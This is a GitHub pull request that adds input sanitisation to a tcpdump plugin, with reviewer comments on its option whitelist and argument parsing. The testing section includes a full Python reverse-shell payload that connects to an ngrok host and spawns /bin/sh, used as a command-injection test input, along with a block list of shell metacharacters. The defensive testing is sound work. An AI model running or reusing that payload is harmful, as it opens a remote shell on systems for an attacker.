Tcpdump - Refreshed the plugin | Updated SDK to the latest version (6.4.3)#3722
Open
igorski-r7 wants to merge 1 commit intotcpdump-1.1.1-releasefrom
Open
Tcpdump - Refreshed the plugin | Updated SDK to the latest version (6.4.3)#3722igorski-r7 wants to merge 1 commit intotcpdump-1.1.1-releasefrom
igorski-r7 wants to merge 1 commit intotcpdump-1.1.1-releasefrom
Conversation
igorski-r7
force-pushed
the
SOAR-20673/tcpdump
branch
from
450ce6a to
dae974c
Compare
ekelly-r7
reviewed
Feb 16, 2026
| DANGEROUS_SEQUENCES = ["&&", "||", "|", ";", "\n", "\r", "`", "$", "$(", "${"] | ||
|
|
||
| # Allowed tcpdump options (whitelist approach) | ||
| ALLOWED_TCPDUMP_OPTIONS = [ |
Collaborator
There was a problem hiding this comment.
i like the whitelist approach but if there's only a read action in this plugin, do we need those flags for file writing and interactive?
e.g. -w / -i / others i think around editing files
ekelly-r7
reviewed
Feb 16, 2026
|
|
||
| # Parse options safely using shlex | ||
| try: | ||
| parsed_options = shlex.split(options) |
Collaborator
There was a problem hiding this comment.
I think this may cause a regression in existing functionality
in tcpdump it's possible to bundle short flags, so the following command is a valid, but would break with this split
tcpdump -nrc10 file.pcap
Collaborator
There was a problem hiding this comment.
fwiw I don't know how we'd resolve this without some very brittle/complex arg parser
would it make more sense to do a major version bump and explicitly call out in the documentation that options must be space separated?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
🎫 Ticket
Ticket: SOAR-20673
🧩 Type of Change
🧠 Background & Motivation
This change is related to fully refresh of the plugin and also add sanitisation for input validation to increase security of the plugin.
✨ What Changed
6.4.3)🧪 Testing
It was tested out locally so far. It was tested for happy path as well as for exception raising.
Casual
tcpdumpcommandInput:
{ "body": { "action": "read", "connection": null, "input": { "pcap": "<B64 DECODED FILE>", "options": "-i eth0", "filter": "" }, "meta": {} }, "type": "action_start", "version": "v1" }Output:
{ "body": { "log": "", "status": "ok", "meta": {}, "output": { "dump_contents": [ "16:05:38.216729 ARP, Request who-has 10.10.10.251 tell 10.10.10.49, length 28", "16:05:38.217191 ARP, Reply 10.10.10.251 is-at 00:12:79:80:69:60 (oui Unknown), length 46", "16:05:38.217203 IP 10.10.10.49.55341 > 10.10.10.251.631: Flags [S], seq 3691384616, win 5840, options [mss 1460,sackOK,TS val 7073320 ecr 0,nop,wscale 7], length 0", "16:05:38.217778 IP 10.10.10.251.631 > 10.10.10.49.55341: Flags [S.], seq 3044449793, ack 3691384617, win 5840, options [mss 1460,nop,wscale 0,nop,nop,TS val 5827876 ecr 7073320], length 0", "16:05:38.217806 IP 10.10.10.49.55341 > 10.10.10.251.631: Flags [.], ack 1, win 46, options [nop,nop,TS val 7073323 ecr 5827876], length 0" ], "dump_file": "<B64 DECODED FILE>", "stderr": "reading from file /tmp/input-04474a6d-7ed9-45a4-adc2-d0cf94ca5b08.pcap, link-type EN10MB (Ethernet), snapshot length 65535\n" } }, "version": "v1", "type": "action_event" }Command injection in awk for Process String action
Input:
{ "body": { "action": "read", "connection": null, "input": { "pcap": "<B64 DECODED FILE>", "options": "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"0.tcp.ngrok.io\",NGROK_PORT ));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess .call([\"/bin/sh\",\"-i\"])' #"", "filter": "" }, "meta": {} }, "type": "action_start", "version": "v1" }Output:
{ "body": { "log": "", "status": "error", "meta": {}, "error": "An error occurred during plugin execution! Invalid options provided. Options contain dangerous sequence: ;", "exception": { "cause": "Invalid options provided. ", "assistance": "Options contain dangerous sequence: ;", "data": "" } }, "version": "v1", "type": "action_event" }